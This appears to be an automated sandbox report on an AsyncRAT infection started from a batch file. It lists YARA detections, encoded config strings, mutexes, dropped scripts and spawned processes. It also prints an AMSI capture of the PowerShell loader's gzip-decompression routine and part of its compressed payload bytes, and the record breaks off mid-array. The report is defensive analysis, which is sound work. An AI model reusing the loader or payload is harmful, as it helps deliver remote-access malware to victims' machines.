Source: amsi64_7584.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966443638.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.16966427fe0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.1696705a0e0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.16966491660.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966491660.2.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 20.2.powershell.exe.16966443638.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_asyncrat author = Sekoia.io, description = Detect AsyncRAT based on specific strings, creation_date = 2023-01-25, classification = TLP:CLEAR, version = 1.0, id = d698e4a1-77ff-4cd7-acb3-27fb16168ceb
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000014.00000002.1917706450.0000016967059000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000015.00000002.4155829420.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000014.00000002.1917706450.0000016968A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
Source: 00000014.00000002.1917706450.000001696616A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: 00000014.00000002.1917706450.000001696643C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
Source: Process Memory Space: powershell.exe PID: 7584, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: aspnet_compiler.exe PID: 7440, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys

Source: 20.2.powershell.exe.1696855aa18.7.raw.unpack, c49e11983285d4ab2e059050de6df5a41.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: 20.2.powershell.exe.1697d090000.8.raw.unpack, c49e11983285d4ab2e059050de6df5a41.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, jqtttYwiGRmYWE.cs	Base64 encoded string: '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
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, jqtttYwiGRmYWE.cs	Base64 encoded string: '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

Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, DVmNcdalvHBr.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.powershell.exe.16966427fe0.4.raw.unpack, DVmNcdalvHBr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, DVmNcdalvHBr.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 20.2.powershell.exe.1696705a0e0.5.raw.unpack, DVmNcdalvHBr.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.expl.evad.winBAT@36/13@4/4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\Public\HTRFAAYAKOCE.bat

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbelthy1.zdp.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\27#U0646.bat" "

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\WindowsHost\HHYKTIPGRYF.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $gzipStream.CopyTo( $output ) $gzipStream.Close()$input.Close()[byte[]] $byteOutArray = $output.ToArray() Write-Output $byteOutArray }}[byte[]] $CEPQNIYC = CLDMAXQMSN(31,139,8,0,0,0,0,0,4,0,180,125,9,124,27,213,209,248,236,74,94,29,62,98,217,142,108,199,73,236,28,118,20,231,190,192,137,147,16,73,190,100,249,144,45,31,146,185,34,89,178,172,195,90,121,37,217,150,3,33,156,133,150,179,45,119,185,161,64,91,160,148,182,52,133,150,27,74,41,45,80,160,5,146,66,160,45,31,71,225,163,240,125,61,184,254,51,111,87,135,143,80,250,253,254,165,245,236,204,188,121,243,230,205,123,111,222,177,111,149,206,161,139,65,5,0,106,252,251,252,115,128,159,128,252,223,30,248,215,255,29,192,191,162,234,159,22,193,15,117,79,47,251,9,215,241,244,178,190,209,96,188,38,38,137,1,201,51,86,51,236,137,70,197,68,141,215,95,35,37,163,53,193,104,77,83,183,179,102,76,244,249,215,23,22,234,87,42,58,28,205,0,29,156,10,146,23,109,245,165,245,190,6,60,151,207,105,1,62,65,66,47,243,126,190,136,3,168,65,164,134,147,173,35,156,151,237,6,200,62,97,47,199,248,192,146,247,158,13,80,204,254,159,125,102,30,236,191,24,234,181,131,172,247,115,205,60,149,220,195,65,193,151,240,197,156,255,208,62,109,14,169,69,186,45,135,94,159,240,79,37,240,249,232,63,101,89,86,87,126,142,138,189,235,165,184,52,140,56,179,141,234,78,74,63,155,101,34,254,127,189,228,143,136,40,88,160,216,204,116,9,220,108,57,203,108,51,175,95,36,203,180,177,226,243,96,237,52,64,211,245,192,250,4,166,8,95,186,190,202,127,15,188,179,116,224,227,167,47,111,252,65,37,191,114,227,45,83,86,216,53,208,244,220,82,239,193,231,63,56,240,230,159,31,217,110,94,15,27,224,4,148,91,202,155,170,176,113,235,23,237,47,195,198,171,95,202,31,96,207,69,251,23,42,228,66,153,52,42,164,81,38,203,21,178,92,38,43,20,178,66,38,43,21,178,82,38,23,41,228,34,153,172,146,31,139,21,238,98,153,92,162,144,75,100,114,169,66,178,103,61,111,50,163,145,198,207,84,245,155,247,231,35,71,37,90,200,232,245,113,178,253,0,83,248,103,211,106,116,211,14,19,214,201,84,79,216,82,194,214,16,86,70,216,42,194,168,19,155,80,68,216,78,14,45,51,165,72,203,254,234,197,166,235,72,79,53,234,169,94,36,227,216,230,106,227,129,101,164,121,96,127,45,62,76,91,48,219,